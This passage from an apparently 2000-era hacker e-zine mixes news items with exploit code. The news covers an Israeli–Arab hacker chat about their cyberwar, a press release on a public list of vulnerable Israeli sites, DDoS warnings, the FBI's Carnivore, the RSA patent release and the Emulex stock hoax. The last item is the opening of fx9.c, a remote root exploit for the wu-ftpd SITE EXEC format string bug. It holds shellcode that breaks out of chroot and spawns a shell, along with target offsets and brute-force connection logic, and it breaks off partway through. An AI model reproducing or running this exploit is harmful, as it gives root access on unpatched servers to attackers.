      the Middle East peace process for decades. Although the dialogue is choppy at
      times, it provides a rare glimpse into how the Net can be used as both a weapon
      and as a medium for fostering communication between the most bitter of
      enemies. 
  
      Avi: Do you guys have any respect, as hackers, for what you've been doing to
      each other? 
  
      Miki: Yes.
  
      Miki: I respect him.
  
      m0nk3y of Arab: I always respect my enemy, whoever he is. 
  
      Sammy: Hmmm.
  
      Miki: Because first of all, he is a person. 
  
      Both sides were asked to briefly provide details of their regional hacking
      experiences before the latest wave of violence in the Middle East crisis erupted.
      The Arabs were much more guarded than Bouzaglo. 
  
      Avi: Did you guys attack Israeli sites before? 
  
      Sammy: Probably.
  
      m0nk3y of Arab: Sites? No. Machines? Yes. 
  
      Avi: Servers, you mean?
  
      m0nk3y of Arab: You can say that. 
  
      Avi: Miki: What about you?
  
      Miki: In the past, I hacked some sites in Lebanon. 
  
      m0nk3y of Arab: Can you define which sites? 
  
      Miki: almanar mokowama atc. almanar.com.lb 
  
      m0nk3y of Arab: Got it.
  
      Miki: And more propaganda sites that call to "Kill the Israeli." 
  
      Politics snuck into the next round of dialogue  but were quickly snuffed out 
      when participants were asked whether they consider themselves part of global
      hacker culture, or a breed apart, since they are ideologically driven. 
  
      Avi: Do you feel like you fit into the general hacker scene or is it different? 
  
      Sammy: Yes, but with ethics. For a good cause. 
  
      m0nk3y of Arab: Agree.
  
      Avi: Which is in this case is?
  
      Sammy: The sick propaganda.
  
      Miki: But Monkey, don't you think that the Palestinians started this war? 
  
      Miki: Believe me, we want peace. But it's not easy. 
  
      Sammy: Let's not get into politics, please. 
  
      Bouzaglo then jumps into his main message for the evening, pleading with his
      Arab counterparts to halt the online hostilities. 
  
      Miki: May I ask you something, Monkey? 
  
      m0nk3y of Arab: Do.
  
      Miki: Will you continue to attack the Netvision servers? Or do you think that we
      need to change tactics? 
  
      m0nk3y of Arab: If I stop, my mates will continue till all Palestinians get their
      rights. It's not my decision only, miki ... We are a team. 
  
      Miki: But I will tell you something. I stopped it, I stopped the attacks. 
  
      Both sides have said their main motivation for attacking has been to silence
      propaganda on the other side. But in a wired world, people can always find
      alternative ways of getting the same information. 
  
      Avi: Isn't it kind of futile to spend all your time on this? 
  
      Miki: This is why I changed tactics. I spoke on TV and radio to stop all the
      attacking. 
  
      m0nk3y of Arab: Right, but [the attacks] make it more difficult for normal people
      to find the other point of view. 
  
      Miki goes back to his cease-fire appeal. 
  
      Miki: Can you say to me that you are going to stop the virtual war? 
  
      Sammy: I thought we haven't started yet? 
  
      m0nk3y of Arab: LOL [laugh out loud] Sammy. 
  
      Sammy: No, for real.
  
      Miki: We also can do a lot of damage on the Lebanon sites and servers but  It's
      not OK and right to do it. 
  
      m0nk3y of Arab: Lebanese servers are not the only Arab servers, miki. 
  
      Miki: I know, there's a lot in the U.S. 
  
      m0nk3y of Arab: If you stop attacks from Lebanon, you will find a lot from
      others. 
  
      Sammy: Anyhow, no hacker in his right mind would do this for fun, there is an
      important cause that arose recently. We didn't start this, we didn't start the war
      in Palestine. 
  
      m0nk3y of Arab: As I said, what we did is a reaction to what's happening. 
  
      Sammy: I wish for every Arab to look deep inside of him and do what is right 
      an eye for an eye. 
  
      Miki: So I see that you want to continue this war? 
  
      Sammy: This is a small part of a big world. 
  
      m0nk3y of Arab: Miki, do you think you can control this cyberwar? 
  
      Miki: No, you and not me can stop it because we are not [responsible for] all the
      hacking. 
  
      m0nk3y of Arab: Exactly right.
  
      Raw emotions come to the fore. 
  
      m0nk3y of Arab: Miki, can you give us a general background what you were doing
      during your military service? Were you hitting Palestinians? 
  
      Miki: No, I didn't. But, dear friend, don't think that we are the bad guys. 
  
      m0nk3y of Arab: I didn't say that. What do you feel if you see an Israeli soldier
      enjoying killing a Palestinian? 
  
      Miki: We can't stop this war, but we can put it down. 
  
      m0nk3y of Arab: How, miki? Explain. 
  
      Miki: Believe me. For the Palestinians it's their independence war. You see,
      Sammy, how could anyone shoot a kid and have a smile on his face? 
  
      Sammy: Have you been watching the news? Pictures. 
  
      Miki: Tell me, did you see the crowd of Arabs from Ramallah [in the West Bank]
      lynching 2 Israeli soldiers? 
  
      Miki: Yes.
  
      Sammy: Do you remember Hitler?
  
      Miki: Yes, I do.
  
      Sammy: Arabs feel the same about the Jews. 
  
      m0nk3y of Arab: Soldiers are different than unarmed civilians. 
  
      Miki: Why do you dislike the Israelis? 
  
      m0nk3y of Arab: I hate their actions, not them personally. 
  
      Sammy: Mass killings of innocent kids is shameful and disgusting. 
  
      Miki: So you think that if you hack some Israeli sites you will fix the problem? 
  
      Miki: We need to talk.
  
      Sammy: Talk talk talk! We've done sooo much talking and no action. 
  
      Realizing he will not persuade his adversaries to call off the hacker war, Bouzaglo
      tries another tactic. Somewhat naively, he tries to find out if his chat partners
      have any information about three Israeli soldiers who were kidnapped last month
      by Hezbollah, the Lebanese guerrilla movement. M0nk3y appears to
      misunderstand and thinks Bouzaglo is trying to argue that the kidnappings justify
      Israel's actions against Palestinians. 
  
      Miki: Do you know something about the 3 Israeli soldiers? 
  
      m0nk3y of Arab: They are soldiers, not civilians, miki. 
  
      m0nk3y of Arab: I don't enjoy shooting kids. 
  
      Miki: Please, do you know something about it? 
  
      m0nk3y of Arab: No, miki.
  
      Miki: So, dear Monkey, can you get info about it? 
  
      m0nk3y of Arab: Don't take it personally, miki. 
      
      
  
      
      Israeli Underground Press release:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      *** IMPORTANT NET SECURITY PRESS RELEASE ***
      
      To your attention:
      
      According to Wired News, CNN, Cnet and other reliable sources, phase
      three and four of the Israeli-Arab cyber war has begun. That means,
      attacks on the Israeli Internet infrastructure and the intrusion into
      Israeli e-commerce sites are the next step in what we experienced
      lately as cyber vandalism.
      
      With this information, and additional insider information, which sites
      are going to be attacked in the near future, IIU, the Israeli Internet
      Underground, decided to set up the "SODA" Project. With this project they
      want to warn about the coming danger and to announce publicly all endangered
      Israeli sites. The "SODA" Project mainly consist of a list on a public web
      site, that lists all the Israeli websites which bear security vulnerabilities
      and likely to be broken into by Islamic groups in the near future.
      
      IIU addressed 2xs Ltd. in the hope to find a company that is willing to
      support their non-profit project and to provide it with solutions.
      2xs Ltd. agreed to provide consulting and solutions free-of-charge for a
      certain time, and is also trying to motivate other Israeli security
      companies to take part in this project and to offer "first-aid" solutions
      to all the endangered sites, free-of charge as well.
      
      IIU sees that Israeli Internet security is seriously endangered and that
      precaution must be undertaken very fast. This is a call for everybody to
      have a close look at the security situation of the Israeli Internet and
      to act.
      
      2xs Ltd. is asking you to publish this information and to help us
      motivating the Internet community and security companies in Israel,
      to provide help where necessary. Also, not only single sites are endangered,
      but the planned and upcoming attacks might have a serious impact on the
      Israeli economy, therefore concerning all of us. We thank you in advance
      for seriously looking into this matter.
      
      
      Further info:
      
      To whom it may concern,
      
      I'm forwarding you a message of the "IIU", a non-profit security group from
      Israel who have contacted me. I'm sending this on to you since they would like
      to stay anonymous. As a response to the recent attacks against sites in Israel,
      they've put up a page with vulnerability information about hosts in Israel at
      www.iiu.org.il in an attempt to stop the ongoing attacks, to generate security
      awareness and to let companies look up their host to see if they need to
      apply more security measures to their sites.
      
      Mixter
      
      
      ---------- Forwarded message ----------
      Date: Thu, 8 Nov 2000 21:03:06 +0200 (IST)
      To: mixter@newyorkoffice.com
      Subject: Important
      
      I'm writing you on behalf of the Israeli Internet Underground. We are a
      group of "white-hats" (ethical hackers) determined to protect the Israeli
      internet from attacks from malicious groups in the name of the Israeli spirit.
      
      As you may know, many sites and service providers in Israel are suffering
      from cyber attacks by certain anti-Israel groups of malicious hackers. We
      have reason to believe that attacks are shifting from Denial Of Service
      attacks to server break-ins and attempted compromise of resources such as
      e-commerce sites and large institutions, and this is going to get worse
      very soon.
      
      IIU is putting all its effort into drastically improving security for
      Israeli sites, and increasing the security awareness. Therefore, IIU has
      contributed all it's resources and information about the security problems
      in the infrastructure of the Internet sites in Israel, and together with
      a local security company, 2XS Ltd., we generated a comprehensive list of
      sites and networks in Israel which are vulnerable to and could fall victim
      to digital break-ins, and a separate report with descriptions and security
      fixes for each site.
      
      We are providing this list under the following URL:
       http://www.iiu.org.il
      
      We sincerely hope you understand the importance of this project and that
      you will support us in generating awareness among Israel's Internet community
      by forwarding this mail, spreading the word about this resource, and adding a
      link or a banner to our site.
      
      Please do not hesitate to contact us regarding any questions you might have.
      
      Of course, we have taken appropriate steps to protect this critical
      information from misuse. We are providing names and network ranges of every
      vulnerable site in Israel, which can be browsed on the site.
      
      
       With thanks and regards,
      
       The Israeli Internet Underground
      
  
       @HWA
     
343.0 [IND] NOCPulse and ISS warn of impending DDoS attacks this Christmas
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ISS' Web site is at http://www.iss.net . 
      NOCpulse's Web site is at http://www.nocpulse.com . 
      Reported by Newsbytes.com, http://www.newsbytes.com 
      
      Byline:

      Denial of Service Attacks Planned For Christmas - ISS         

      By Steve Gold, Newsbytes
      ATLANTA, GEORGIA, U.S.A., 17 Nov 2000, 12:35 PM CST 
      
      X-Force, the research and development (R&D) team of Internet 
      Security Systems [NASDAQ:ISSX] (ISS), has warned that hackers are planning 
      an online attack-fest this coming Christmas. 

      The attacks, if they occur, will take the form of distributed denial of 
      service (DDOS) invasions, a hacker flooding technique used earlier this 
      year - and since - to effectively flood out a major Web site and prevent 
      normal users from gaining access, ISS said. 

      The technique was used in February of this year when Amazon, Buy.com, CNN 
      Interactive, eBay and a number of other high-profile sites were downed by 
      hackers, apparently using DDOS applications known as "Trinoo," 
      "Stacheldraht" and "TFN2K." 

      ISS was one of the first IT security companies to issue an advisory over 
      DDOS attacks back in early February, warning Web site managers to be aware 
      that the offending applications could bring down an enterprise network or 
      e-commerce site by flooding it with large amounts of traffic. 

      In addition, the firm advised that, while there is little that sites can 
      do to prevent such attacks, companies can take steps to ease the pain, 
      including assembling an incident response team, tapping resources from the 
      organization's Internet service provider (ISP) and the computer emergency 
      response team (CERT) advisory team. 

      ISS has also advised organizations to establish links with local law 
      enforcement authorities, so that, if an attack occurs, the appropriate 
      people can be notified quickly. 

      A spokesperson for ISS told Newsbytes that the firm has detected a 
      definite pattern amongst DDOS attacks and, coupled with its knowledge of 
      the hacker community, is warning major sites to be on alert for attacks 
      this Christmas. 

      The need for preparation amongst major Web site operators is great, the 
      company says; only 10 percent of Web sites with e-commerce operations have 
      preparations in place. 

      In parallel with its warning of impending DDOS attacks this Christmas, ISS 
      has teamed up with NOCpulse, a newly launched provider of outsourced 
      Internet infrastructure management services, to deliver managed security 
      services to customers. 

      As an emerging services provider, NOCpulse plans to add ISS' managed 
      security service offerings and operational expertise to major customers, 

      As a result, ISS says that NOCpulse customers will have access to key 
      managed security services offerings as well as top notch security 
      expertise. 

      Mark Hangen, ISS' general manager of managed security services, said that 
      NOCpulse represents a new breed of managed service provider (MSP) that can 
      give companies the information they need to proactively manage their 
      Internet infrastructure. 

      Paul Anatinelli, NOCpulse's founder and president, meanwhile, said that 
      the NOCpulse command center is the first Internet operational support 
      service (IOSS) designed to give customers full control over their Internet 
      infrastructure, 

      ISS' Web site is at http://www.iss.net . 

      NOCpulse's Web site is at http://www.nocpulse.com . 

      Reported by Newsbytes.com, http://www.newsbytes.com . 

      12:35 CST 

      (20001117/Press Contact: David Bridson, ISS +44-20-7626-7070; Michell 
      Norwood, ISS 678-443-6000 /WIRES TOP, ONLINE, LEGAL, 
      PC/DOTCOMATTACK/PHOTO) 

       

      -=-
      
      http://www.nocpulse.com/
      
      About NOCpulse
      NOCpulse is an Internet Operational Support Service company that provides the strategy, systems and information
      that businesses need to proactively manage their Internet infrastructure.
    
    
      How We Started
      Industry veterans from organizations including Excite@Home and Global Crossing (formerly GlobalCenter)
      founded NOCpulse in April 2000.
    
    
      Market Need
      Faced with the twin challenges of managing Internet operations while scaling for the future, web-critical
      businesses are quickly overwhelmed by the intense need for both human and capital resources. NOCpulse
      alleviates this pressure by offering an outsourced Web infrastructure management service, putting proactive control
      back in the hands of IT staff.
    
    
      The NOCpulse Command CenterSM
      The NOCpulse Command Center is the industry's first Internet Operational Support Service (IOSS), empowering
      businesses with total control over their Internet infrastructure. By deploying the NOCpulse Command Center, a
      company will dramatically reduce the total cost associated with the operation of web environments and gain the
      intelligence to grow proactively and optimize its operations. Outsourcing Internet management operations through
      NOCpulse will allow companies to more efficiently deploy their human capital investments while sharpening their
      awareness of system operations. IT personnel can re-focus on delivering real value to the core business
      competencies of a company.
    
    
      The NORAD of the Internet
      Deep within Cheyenne Mountain, Colorado, the NORAD command and control center serves as a central collection
      and coordination facility for a worldwide system of sensors designed to provide an accurate picture of US and
      Canadian airspace. Like NORAD, NOCpulse serves and protects its customers through superior information used
      to watch, respond and protect their Internet infrastructure.
    
    
      Management

      Executive
      Paul Santinelli, President and Founder
      Steve Springsteel, Chief Financial Officer
      Jon Prall, Sr. VP, Technology
      Dan Nater, VP, Operations
      Jim Gerber, VP, Sales
      Dave Parker, Principle Engineer

      Board of Directors
      Paul Santinelli, President and Founder
      David Sze, General Partner, Greylock
      Angelo Santinelli, General Partner, North Bridge Venture Partners

      Board Observers
      David Strohm, General Partner, Greylock
      Richard D'Amore, General Partner, North Bridge Venture Partners

      Funding
      Series A, April 2000: $12 Million, Greylock and North Bridge Venture Partners

      Contact Info:
      NOCpulse, Inc.
      1293 Mountain View Alviso Road, Suite D
      Sunnyvale, CA 94089
      (408) 542-2800
      www.nocpulse.com
      info@nocpulse.com               
      
      
344.0 [IND] Oct 2000: Carnivore does more than previously thought
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      http://www.theregister.co.uk/content/1/13767.html
      
      Carnivore does more than previously thought
      By: Thomas C Greene in Washington Posted: 05/10/2000 at 14:49 GMT

      
      Heavily censored FBI documents obtained by US watchdog outfit the 
      Electronic Privacy Information Centre (EPIC), under a Freedom of 
      Information Act (FOIA) lawsuit, indicate that the FBI's electronic snoop 
      known as Carnivore might be able to monitor a good deal more than just 
      e-mail traffic. 

      Among the capabilities that peek out from behind all the indelible black 
      swaths in the documents is an ability to reconstruct an entire Web page as 
      viewed by a subject. A planned, updated version may even be able to 
      capture voice-over-Web communications. Presently the system can capture 
      and record all packet traffic to and from a selected IP, while monitoring 
      a subject's on-line movements. 

      These extra capabilities underscore the controversial issue of FBI 
      reliability in restraining itself when authorised to view only e-mail 
      headers. This is a crucial point, because the Bureau can obtain the 
      on-line equivalent of a pen register order (recording the destinations of 
      out-going communications) or a trap and trace order (recording the origins 
      of in-coming communications) without a warrant signed by a judge. Because 
      of the lower standard, the contents of such communications must not be 
      intercepted. 

      For such limited surveillance the standard of evidence is quite low: the 
      FBI need merely be prepared to prove that the information sought could be 
      material to an investigation. To snoop on the actual content communicated 
      - the on-line equivalent of a telephone wiretap - the FBI must satisfy a 
      judge that a crime is likely to be committed. 

      Some judges hand out wiretap orders as if they were parking tickets; 
      others will laugh one out of chambers for producing less than a smoking 
      gun in evidence. The system is far from perfect, but on balance it does a 
      tolerable job of keeping most of the Feds at an appropriate distance most 
      of the time. 

      But many fear that the FBI could broaden its on-line snooping under 
      limited surveillance orders, succumbing to temptation provided by 
      Carnivore's additional capabilities. Suppose, for example, that FBI agents 
      were to obtain a pen register and/or trap and trace order for a subject, 
      but then go a bit further on their own. Would anyone be the wiser? 

      And what becomes of information collected illegally? It's useless in 
      court, being the poisonous fruit of a forbidden tree. But suppose it were 
      sufficient to tip off the Feds to a criminal act for which they could 
      later obtain evidence legitimately. 

      They wouldn't have known about it if they hadn't broken the law, but 
      they'll build a case in court based on evidence gathered legitimately. 
      Would anyone be the wiser? 

      One possible solution to these concerns would be for the FBI to develop a 
      bare-bones version of Carnivore, capable of intercepting nothing more than 
      e-mail headers, to be used for the on-line equivalent of trap and trace 
      and pen register orders. 

      Thus the full-scale Carnivore with its additional capabilities would be 
      authorised for use only when a wiretap order had been issued by a judge. 
      This wouldn't be a guarantee against abuse of limited snooping authority, 
      but it would add an extra layer of protection for subjects, and a bit more 
      credibility to FBI claims of conscientious self-regulation. Abuse would 
      require a wider circle of cooperation, and so increase the likelihood that 
      an overzealous agent would be caught with his hand in the cookie jar by a 
      supervisor.  

      @HWA
      
345.0 [IND] Surprise! RSA releases crypto patent ahead of schedule
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.zdnet.com/eweek/stories/general/0,11011,2624678,00.html
      
      Surprise! RSA releases crypto patent ahead of schedule

      By Scott Berinato, eWEEK September 6, 2000 11:19 AM ET

      
      RSA Security Inc. today pulled the tablecloth from underneath its 
      competitors' plates, releasing its cryptographic algorithm into the public 
      domain two weeks early. 

      The patent on RSA's crypto technology, which is widely employed in the 
      security realm, would have expired September 20, exactly 17 years after 
      the patent was issued to the Massachusetts Institute of Technology and 
      licensed exclusively to RSA. The 20th has been widely considered a 
      watershed date, circled on the calendards of many security company 
      executives' calendars. Some companies, like Baltimore Technologies Inc., 
      were using the expiration of the patent as a springboard for new products 
      and marketing campaigns. 

      RSA CEO Art Coviello told eWEEK that the company wanted to get this 
      milestone out of the way because it was garnering too much attention and 
      confusing customers. 

      "Someone asked me if I had thought about extending the patent, and that's 
      the thing," Coviello said. "The idea of extending the patent hadn't even 
      occurred to us because it's just not part of our business. Why would we 
      not want this to be the de facto standard in the public domain? So now 
      it's out there." 

      Coviello also said that the expiration of patent number 4,405,829 hasn't 
      affected the company's strategic direction, which appears to remain 
      focused on technology. While other companies are hurriedly extending into 
      managed security services, RSA wants to remain a company entrenched in 
      code. 

      "We're not schizophrenic," Coviello said. "We know who we are. We won't 
      try to be something we're not. I don't think you can execute on a managed 
      services model and a product model at the same time." 

      @HWA
      

346.0 [IND] Hackers: The millennial scapegoats?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.theregister.co.uk/content/6/12010.html?&_ref=233393570
      
      Hackers: The millennial scapegoats?
      By: Kieren McCarthy
      Posted: 18/07/2000 at 15:59 GMT

      The leak of a confidential memo outlining PM Tony Blair's concerns
      that New Labour is out of touch with the electorate appears to have
      been pinned on hackers. 

      The leak came as an embarrassment to the government, especially
      considering recent criticism of its policies. After the memo came to
      light, papers were quick to point out the significance of it only being
      sent to close confidants of the prime minister. Who is the mole?,
      was the question posed by many editorials. 

      However, after a day's reflection, a different explanation from the
      traditional frustrated-minister-leak has taken hold. Number 10, the
      theory holds, has been hacked and this explains not only this leak
      but other embarrassing revelations that have come out in recent
      months. 

      This is an extremely tough call to make. On the one hand, this
      explanation is a near-perfect political answer to a nasty situation. On
      the other, it's all too plausible. 

      Faced with the situation, and assuming it was a leak by a senior
      government source, this hacker theory has enormous political
      advantages. It is already in the public domain, so damage limitation
      is the order of the day. The hacker story will pull media attention off
      its search for who leaked the material and push it towards computer
      security concerns. Aside from lifting scrutiny and pressure on the
      party, it also produces a smokescreen behind which Labourites can
      try to find who actually released the information. 

      Building on the idea that it has been hacked will also provide the
      government with a certain degree of sympathy - most people have
      had their privacy invaded at some point and know that reality is often
      very different from the perceived truth. On top of this, this whole
      situation elevates the issue of computer security and thus Internet
      technology and the digital world. It's what's called making the best of
      what you've got. 

      But then, of course, it may be a hack job. Whitehall has been
      pushing through some fairly hefty IT projects recently in its bid to
      make the government totally Internet-enabled by 2005. When things
      go this fast, it only needs one civil servant with an astute IT
      knowledge to find a hole in the system. Once that hole is found, and
      with people rushing ahead with other projects, it is not inconceivable
      that you could gain and fortify a foothold in the government's IT
      system. A very useful foothold to have. The recent defacing of the
      Cabinet Office Web site also points to the fact that Downing Street
      has been targeted by hackers. 

      "Senior sources" have also pointed out that recent leaks have had
      one thing in common: they have been sent via email. What's the truth
      of this? Well, we would apply the if-it-sounds-too-perfect-it-ain't-true
      rule. In this case, we don't believe a word of it. 

      Getting cynical for a moment, it is not even inconceivable that this is
      an intentional leak. If you look at it, the memo basically says that
      Tony Blair actually has his finger on the UK's pulse by, er... not
      having his finger on the pulse. He is seen to be answering the press'
      concerns, he is concerned about the British public blah blah blah. 

      So what is actually going on? We really couldn't tell you. But
      whatever story you believe, it does demonstrate one thing: that the
      government has become far more tech-savvy than at any time in the
      past. As ever, this will have negative and positive effects on the
      UK's democracy. 

      @HWA
      
347.0 [IND] Student Arrested in Emulex Hoax Case
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.zdtv.com/zdtv/zdtvnews/politicsandlaw/story/0,3685,9239,00.html
      
      Student Arrested in Emulex Hoax Case           
      By Maria Godoy, TechTV News 
      August 31, 2000 
      
      
      FBI officials today arrested a 23-year-old Southern California student in 
      connection with a fake press release that triggered a 50 percent plunge 
      last Friday in the stock price of technology company Emulex. 

      
      Mark Simeon Jakob, a resident of El Segundo, California, was taken to a 
      Los Angeles County courthouse around 11 a.m. Pacific Thursday and charged 
      with multiple felonies, including wire fraud, acting with intent to 
      defraud, participating in a scheme to defraud, and securities fraud. 
      
      He faces a maximum penalty of 15 years in prison. 
      
      Until August 18, Jakob had been an employee of Internet Newswire, the 
      Web-based corporate news service that distributed the bogus press release, 
      and he knew how to navigate its system to get a hoax release through, 
      authorities said. 
      
      "The suspect, we believe, realized about a quarter of a million dollars in 
      profits from trades he made around the time of the fake press release," 
      Mrozek said. 
      
      The fake Emulex press release said the company was restating its earnings, 
      was under investigation by the Securities and Exchange Commission, and 
      that its chief executive had quit. 
      
      FBI agents traced the bogus release to an email sent last Thursday night 
      from a computer in the library of El Camino Community College, where Jakob 
      is a student. Thom Mrozek, a spokesman for the US attorney's office in Los 
      Angeles, said Jakob was seen using a PC in the school library that night. 
      
      Last Friday, investors reacting to the hoax release began frantically 
      selling off shares in Emulex, which lost about $2.5 billion in value in a 
      matter of hours. 
      
      After Nasdaq halted trading in the stock, and the company said the information
      was false, shares recovered nearly all the losses.       
      
      Short-selling scam gone wrong       
      
      According to authorities, Jakob staged the press release hoax in order to 
      avoid heavy losses from a short-selling scam gone wrong.       

      Investors who sell stock "short" borrow shares from a financial 
      institution, betting that the price will fall at some future date. The 
      shares are later replaced at a lower price, and the trader pockets the 
      difference.       

      Jakob allegedly shorted more than 3,000 Emulex shares two weeks ago, 
      selling them at between $72 to $92 a share. However, Emulex share prices 
      did not drop as Jakob had expected, climbing instead to more than $100 by 
      late last week.       

      To avoid potentially steep losses, Jakob manipulated the stock price to 
      plummet. He replaced his borrowed shares at the lower price, reaping a 
      profit of more than $50,000.       

      As Emulex stock continued to plunge, Jakob bought up more shares, selling 
      them three days after the stock price had recovered for a $186,000 profit.       

      This is not the first time a fake press release has been used to influence 
      a company's stock. In 1999, Gary Hoke of North Carolina was fined $93,000 
      and sentenced to five years probation after he falsely reported that 
      PairGain Technologies was about to be sold to an Israeli company.
      
      @HWA
      
348.0 [EXP] fx9.c WuFTPD < 2.6.1 exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
       * THIS IS PRIVATE!! DO NOT DISTRIBUTE!! VERY MUCH PRIVATE!!
       *
       * fx - BETA9 - WU-FTPD REMOTE ROOT EXPLOIT
       * Exploits the format bug on the call SITE EXEC in wu-ftpd < 2.6.1
       *
       * Greets to: All spanish coders in the dark :) 
       *
       * The Dark Raver <doble@iname.com>
       * (23/08/2000 - Spain) 
       *
       * Tired of trying other wu-ftpd exploits and they dont work??
       * Tired of waiting for very slow ways of exploiting??
       * Tired of using exact offsets that never works??
       *
       * This is your exploit!!!! It tests differents aligns, lengths, sizes 
       * and offsets until it found the shell.
       * 
       * Usage: fx9 <host> [offset] [eat] [align] [address] [-d] [-f]
       * [offset] -> The position of the stack where is stored some eip
       * [eat] -> The number of %.f used
       * [address] -> The address in memory of our shellcode, can be stack or heap
       * [-d] -> Use debug, more output and control over the calculation process
       * [-f] -> Force values, dont test if values are correct 
       *
       * The code sucks, but work 90% of times on 90% of vulnerable wu-ftpd for 
       * linux. Just play with the values.
       *
       * Example:				Offset		Ret		Eat-Align
       * SuSe 6.3 wuftpd.rpm 2.6.0-20		0xbfffae68	0xbffffd9b	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 	0xbfffd074	0xbfffdd14	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm 	0xbfffae68	0xbffffd9b	137-2	
       * SuSe 6.3 wuftpd.rpm 2.6.0-20		0xbfffce94	0xbfffd6d4	137-2
       * Caldera 1.1 wu-2.4.2-academ[BETA-15](1) 0xbfffec14	0xbffffee0	5-2
       * SuSe 5.1 wuftpd-2.4.2beta15-5	0xbfffeafc	0xbffffdf8	5-2
       * ?? wu-2.4(1)				0x????????	0x????????	5-6
       * ?? wu-2.4(4)				0xbffff0dc	0xbffffe14	5-2 
       * RedHat 5.0 wu-ftpd-2.4.2b15-5	0xbfffef28	0xbffffdf4	5-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm	0xbfffae68	0x8075a10	137-2
       * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm	0xbfffae68	0x8076cb0	137-2
       *
       *
       * !!NOTE!! Dont use offsets with the chars 0x00 (dont be lamer! ;)
       *
       * !!NOTE!! wu-ftpd converts to lowercase so most 0x41-0x5A will be converted 
       * to another values.
       * 
       * !!NOTE!! The shellcode and some strings printed in the screen can corrupt
       * your terminal simply ^Z, reset and fg.
       *
       * Para Omnis la mejor y la imposible:
       *
       *  "Hoy la tierra y los cielos me sonrien,
       *   Hoy llega al fondo de mi alma el sol,
       *   Hoy la he visto... la he visto y me ha mirado...
       *   Hoy creo en Dios!"
       *
       */
      
      #include <stdio.h>
      #include <string.h>
      #include <stdarg.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <unistd.h>
      #include <arpa/inet.h>
      #include <sys/errno.h>
      #include <sys/types.h>
      #include <sys/select.h>
      
      int debug=0; // change this if you want output
      int force=1;
      
      #define EAT 137
      #define TOEIP 0xbfffae68 
      #define ALIN 2
      #define RETN 0xbffffd9b
      #define BUFLEN 1024
      #define BIGBUF 10000
      #define INICIO 0x245
      
      void conectar(char *host);
      void term(void);
      void mkcode1(void);
      void mkbuf(void);
      void mkini(void);
      void mkalin(void);
      void mksh(void);
      void status(void);
      
      char code1[40];
      
      // nops + suid + break chroot + sh
      char code2[]=
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\x88"
      "\x46\x07\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d"
      "\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xff\xf7\xdb"
      "\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0"
      "\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x89\x76\x08\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff\xff"
      "\xff\xff/bin/sh";
      
      char code3[8];
      
      // Global variables rulez!!! ;)
      
      int alin=ALIN;
      int eat=EAT;
      unsigned int toeip=TOEIP;
      unsigned int retn=RETN;
      char buf[BUFLEN];
      int inicio=INICIO;
      int opt=1;
      
      int sock;
      struct sockaddr_in sa;
      struct hostent *hp;
      
      int main(int argc, char *argv[]) {
      char mbuf[BIGBUF];
      int c;
      char *str;
                                                          
      while ((c = getopt(argc,argv,"df"))!= -1){
      	switch (c) {
      		case 'd':
      			printf("Debug active\n");
      			debug=1;
      			break;
      		case 'f':
      			printf("Forcing values\n");
      			force=0;
      			break;
      		}
      	}
      	
      argc -= optind;
      argv += optind;
      
      //printf("%i\n", argc);
      
      if(argc!=5) {
      	fprintf(stderr,"Usage: fx <host> [offset] [eat] [align] [address] [-d] [-f]\n");
          	if(argc==1) {
          	printf("Using default values: offset=%x eat=%i align=%i add=%x\n",
          	toeip, eat, alin, retn);
          	} else {
          	exit(0); }
          	}
         
      printf("1. Connecting...\n");
      
      if(debug) getchar();
      
      conectar(argv[0]);
      
      printf("2. Calculating eat...\n");
      
      if(debug) getchar();
      
      if(argc>=3) { sscanf(argv[2], "%i", &eat); }
              else { eat=EAT; }
      
      // The real spaghetti coding!!! ;)
      
      if(force) {
      eat--;
              
      do {
      eat++;
      memset(code1,0x30,40);
      
      mkalin();
      
      send(sock,buf,strlen(buf),0);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
      str=strchr(mbuf,'|');
      if(str==0) {
      	printf("Unable to complete search!\n");
      	exit(-1); }
      str[9]='\x00';
      
      printf("Using eat: %i\n", eat);
      printf("<%s>\n\n",str);
      
      if(!(strncmp(str,"|30303030",9))) {
      	opt=0; }
      
      memset(mbuf, 0, BIGBUF);
      
      c=recv(sock, mbuf, sizeof(mbuf), 0);
      if(debug) puts(mbuf);
